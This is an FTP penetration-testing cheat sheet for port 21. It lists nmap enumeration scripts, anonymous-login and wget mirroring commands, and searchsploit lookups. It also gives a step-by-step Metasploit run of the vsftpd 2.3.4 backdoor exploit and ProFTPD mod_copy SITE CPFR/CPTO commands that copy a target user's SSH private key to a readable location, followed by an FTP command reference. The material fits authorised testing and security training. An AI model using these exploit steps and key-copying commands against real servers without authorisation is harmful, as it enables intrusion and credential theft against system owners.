Skip to content

21 - Pentesting ftp

FTP stands for "File Transfer Protocol". It's a standard network protocol used for transferring files from one host to another over a TCP-based network, such as the Internet. FTP is commonly used for uploading and downloading files from websites, servers, and other computers.


sudo nmap -p 21 --vv $IP
sudo nmap -p 21 --vv -sC -sV $IP
sudo nmap -p 21 --vv -A $IP
sudo nmap -p 21 --script=ftp-anon $IP
sudo nmap -p 21 --script=ftp-* $IP

anonymous login

lftp $IP
ftp $IP
|<- anonymous
|<- anonymous

ftp $IP
|<- anonymous
|<- password

wget download directory

wget -r ftp://anonymous@$IP/Logs # download directory
wget -m ftp://anonymous:anonymous@$IP # donwload all
wget -m --no-passive ftp://anonymous:anonymous@$IP # download all


proFtpd 1.3.5

sudo nmap -p21 --script-help=ftp-proftpd-backdoor.nse
searchsploit proftpd 1.3.5

vsFtpd 2.3.4

sudo nmap -p21 --script-help=ftp-vsftpd-backdoor
searchsploit vsftpd 2.3.4
msf> use exploit/unix/ftp/vsftpd\_234\_backdoor
msf> show options
msf> set RHOST
msf> show options
msf> exploit


SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

SITE CPFR /home/{TARGT_USER}/.ssh/
SITE CPTO /var/tmp/
  • USER username
  • PASS password
  • HELP The server indicates which commands are supported
  • LIST This will send the list of files in current folder LIST -R List recursively (if allowed by the server)
  • APPE /path/something.txt This will indicate the FTP to store the data received from a passive connection or from a PORT/EPRT connection to a file. If the filename exists, it will append the data.
  • STOR /path/something.txt Like APPE but it will overwrite the files
  • STOU /path/something.txt Like APPE, but if exists it won't do anything.
  • RETR /path/to/file A passive or a port connection must be establish. Then, the FTP server will send the indicated file through that connection
  • REST 6 This will indicate the server that next time it send something using RETR it should start in the 6th byte.
  • TYPE i Set transfer to binary
  • PASV This will open a passive connection and will indicate the user were he can connects
  • PUT /tmp/file.txt Upload indicated file to the FTP